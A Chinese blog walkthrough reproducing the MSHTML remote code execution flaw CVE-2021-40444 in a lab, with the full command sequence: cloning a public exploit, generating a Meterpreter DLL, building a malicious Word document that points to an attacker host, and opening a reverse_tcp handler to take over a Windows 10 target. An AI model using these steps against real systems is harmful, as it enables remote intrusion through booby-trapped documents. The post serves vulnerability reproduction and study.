- 2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。
1、漏洞详情:
- Microsoft MSHTML远程代码执行漏洞
- CVE-2021-40444
- 严重级别:严重 CVSS:8.8
- 被利用级别:检测到利用
- 危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。
- 在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档。
2、复现:
- 下载代码,到kali上:
- https://github.com/lockedbyte/CVE-2021-40444
- 没有安装kali的小伙伴,可以参照这篇文章
- 接着我们把源码复制到kali虚拟机上面
![图片[1]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-128.png)
- 接着我们安装依赖,基本上直接复制,终端跑一边就好,我这里因为安装过了,所以提示会和你们不一样
sudo apt-get install lcab
![图片[2]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-129.png)
打开msf生成dll木马文件
- 这里的ip需要自己去ifconfig获取一下,msf端口监听默认4444
![图片[3]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-130.png)
- 接着我们生成恶意文档,将刚刚生成的dll文件,复制到下载的CVE-2021-40444-master文件夹中执行命令
python3 exploit.py generate http.dll http://192.168.60.128
- 生成后保存在CVE-2021-40444/out/document.docx
![图片[4]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-131.png)
- 我们将该文档复制到win10靶机当中,然后依次开启msf和当前木马的监听
msf监听
依次输入一下命令
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
options
set lhost 192.168.60.128
set lport 4444
exploit
![图片[5]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-132.png)
恶意文档监听
python3 exploit.py host 80
![图片[6]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-133.png)
- 接着我们去win10里面打开刚刚生成的文档
![图片[7]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-134-1024x401.png)
然后我们查看kali监控就会发现,已经成功获取权限了
![图片[8]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-135.png)
![图片[9]-CVE-2021-40444-Microsoft MSHTML远程命令执行-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/02/image-136.png)
- 当然这里面涉及
木马免杀 等程序,自己复现漏洞的时间,关闭安全中心就行
- 感谢大家看到这里,写文章不易,谢谢
© 版权声明
安全小天地的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
安全小天地拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:anquanclub@foxmail.com
THE END
请登录后查看评论内容